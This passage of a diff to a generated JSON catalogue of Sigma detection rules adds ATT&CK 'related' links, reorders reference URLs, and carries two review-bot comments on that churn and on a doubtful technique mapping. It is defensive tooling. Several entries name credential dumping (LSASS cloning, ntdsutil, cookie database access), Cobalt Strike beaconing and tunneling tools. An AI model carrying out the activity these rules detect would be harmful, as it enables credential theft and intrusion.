Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { 
@@ -27747,9 +35111,9 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], @@ -27758,6 +35122,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "value": "DNS Query To Remote Access Software Domain" }, @@ -27785,6 +35158,22 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", "value": "Regsvr32 Network Activity - DNS" }, 
@@ -27809,6 +35198,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "value": "DNS Query for Ufile.io Upload Domain" }, @@ -27833,6 +35231,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "value": "DNS Query for MEGA.io Upload Domain" }, @@ -27858,6 +35265,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", "value": "Suspicious Cobalt Strike DNS Beaconing" }, @@ -27883,6 +35299,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "value": "Suspicious TeamViewer Domain Access" }, @@ -27907,6 +35332,15 @@ "attack.t1090.003" ] }, + "related": [ + { + "dest-uuid": "a782ebe2-daba-42c7-bc82-e8e9d923162d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "value": "Query Tor Onion Address" }, @@ -27931,6 +35365,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "value": "Suspicious LDAP Domain Access" }, 
@@ -27953,6 +35396,15 @@ "attack.t1189" ] }, + "related": [ + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", "value": "Possible DNS Rebinding" }, @@ -27978,6 +35430,15 @@ "attack.t1590" ] }, + "related": [ + { + "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", "value": "Suspicious DNS Query for IP Lookup Service APIs" }, @@ -28027,6 +35488,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", "value": "Suspicious Minimized MSEdge Start" }, @@ -28051,6 +35521,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", "value": "Suspicious Subsystem for Linux Bash Execution" }, @@ -28075,6 +35554,15 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", "value": "MSHTA Spwaned by SVCHOST" }, 
@@ -28091,8 +35579,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" ], "tags": [ @@ -28100,6 +35588,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "value": "MMC20 Lateral Movement" }, @@ -28225,6 +35722,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "value": "Rundll32 InstallScreenSaver Execution" }, @@ -28250,6 +35756,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" }, @@ -28274,6 +35789,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "value": "Suspicious Control Panel DLL Load" }, 
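Review bot: The only change to the refs array in the `@@ -28091,8 +35579,8 @@` hunk is the swap of the `drive.google.com` and `enigma0x3.net` entries, which alters nothing semantically and suggests the generator writes refs in whatever order an unordered collection yields them. The same reorder-only churn appears in most refs hunks of this patch (rundll32, dtrack, screenconnect, bitsadmin and others), which buries the substantive additions — the new `related` blocks — in noise and makes every regeneration produce a spurious diff. Preserving the upstream rule's `references` order, or sorting the list before serialising, would make the output reproducible and reviewable. The cluster object these lines belong to starts before the hunk.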
@@ -28319,12 +35843,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1433344116071583746", - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://twitter.com/eral4m/status/1479106975967240209", - "https://twitter.com/eral4m/status/1479080793003671557", "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/nas_bench/status/1433344116071583746", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/eral4m/status/1479080793003671557", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" ], "tags": [ @@ -28332,6 +35856,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", "value": "Suspicious Rundll32 Activity" }, @@ -28356,6 +35889,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", "value": "PsExec Service Start" }, @@ -28380,6 +35922,15 @@ "attack.t1217" ] }, + "related": [ + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "value": "Suspicious DIR Execution" }, 
@@ -28405,6 +35956,15 @@ "attack.t1021" ] }, + "related": [ + { + "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", "value": "Psexec Accepteula Condition" }, @@ -28421,9 +35981,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", - "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", "https://securelist.com/my-name-is-dtrack/93338/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" ], "tags": [ @@ -28431,6 +35991,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", "value": "DTRACK Process Creation" }, @@ -28480,6 +36049,15 @@ "attack.t1539" ] }, + "related": [ + { + "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24c77512-782b-448a-8950-eddb0785fc71", "value": "SQLite Chrome Cookie DB Access" }, 
@@ -28496,8 +36074,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" ], "tags": [ @@ -28505,6 +36083,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "value": "ScreenConnect Backstage Mode Anomaly" }, @@ -28531,6 +36118,29 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "value": "Exfiltration and Tunneling Tools Execution" }, 
@@ -28547,8 +36157,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" ], "tags": [ @@ -28556,6 +36166,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "value": "CL_LoadAssembly.ps1 Proxy Execution" }, @@ -28572,8 +36191,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" ], "tags": [ @@ -28583,6 +36202,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "value": "DNS RCE CVE-2020-1350" }, 
@@ -28600,8 +36235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" ], "tags": [ @@ -28609,6 +36244,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5", "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)" }, @@ -28634,6 +36278,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "value": "XORDump Use" }, @@ -28650,9 +36303,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/frack113/status/1555830623633375232", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" ], "tags": [ 
@@ -28660,6 +36313,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", "value": "Use Short Name Path in Image" }, @@ -28682,6 +36344,15 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "value": "MMC Spawning Windows Shell" }, @@ -28753,6 +36424,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "value": "Microsoft IIS Connection Strings Decryption" }, @@ -28777,6 +36457,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", "value": "IOX Tunneling Tool" }, @@ -28793,9 +36482,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", - "https://twitter.com/countuponsec/status/910977826853068800", "https://twitter.com/countuponsec/status/910969424215232518", + "https://twitter.com/countuponsec/status/910977826853068800", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ 
@@ -28803,6 +36492,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", "value": "Dumping Process via Sqldumper.exe" }, @@ -28851,6 +36549,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", "value": "Use Icacls to Hide File to Everyone" }, @@ -28867,10 +36574,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1036/", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" ], "tags": [ @@ -28879,6 +36585,15 @@ "attack.t1036.005" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "96036718-71cc-4027-a538-d1587e0006a7", "value": "Windows Processes Suspicious Parent Directory" }, 
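Review bot: In the `@@ -28867,10 +36574,9 @@` hunk the `https://attack.mitre.org/techniques/T1036/` reference is dropped, while the `related` block added just below points only at dest-uuid `bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b`, the same UUID the two bitsadmin hunks in this patch emit for the tag `attack.t1036.003`. The visible tag on this rule is `attack.t1036.005`, so either the rule also carries `attack.t1036.003` above the hunk and the `.005` sub-technique was silently skipped, or the tag-to-UUID table maps `.005` onto the `.003` entry. Either way the ATT&CK link removed from refs is not clearly replaced by an equivalent relation; the mapping is worth checking before the MITRE URLs are pruned. The tag list and the cluster object start before the hunk.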
@@ -28951,6 +36666,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" }, @@ -28977,6 +36701,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", "value": "Malicious Payload Download via Office Binaries" }, @@ -29001,6 +36734,15 @@ "attack.t1204" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", "value": "Snatch Ransomware" }, @@ -29017,9 +36759,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/netero1010/TrustedPath-UACBypass-BOF", "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" ], "tags": [ @@ -29027,6 +36769,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "value": "TrustedPath UAC Bypass Pattern" }, 
@@ -29043,8 +36794,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" ], "tags": [ @@ -29052,6 +36803,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "value": "Use of Wfc.exe" }, @@ -29068,10 +36828,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" ], "tags": [ 
@@ -29082,6 +36842,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "99c840f2-2012-46fd-9141-c761987550ef", "value": "Bitsadmin Download File from IP" }, @@ -29098,9 +36874,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Hexacorn/status/1420053502554951689", "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://twitter.com/Hexacorn/status/1420053502554951689", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" ], "tags": [ @@ -29109,6 +36885,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "value": "Suspicious LSASS Process Clone" }, 
@@ -29138,6 +36930,22 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "value": "Potential PE Metadata Tamper Using Rcedit" }, @@ -29164,6 +36972,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", "value": "Base64 Encoded Listing of Shadowcopy" }, @@ -29180,9 +36997,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://github.com/SigmaHQ/sigma/issues/1009", "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" ], "tags": [ @@ -29228,8 +37045,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" ], "tags": [ 
@@ -29237,6 +37054,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e59c230-6670-45bf-83b0-98903780607e", "value": "Gpscript Execution" }, @@ -29253,12 +37079,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1482/", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", - "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", - "https://attack.mitre.org/techniques/T1016/", + 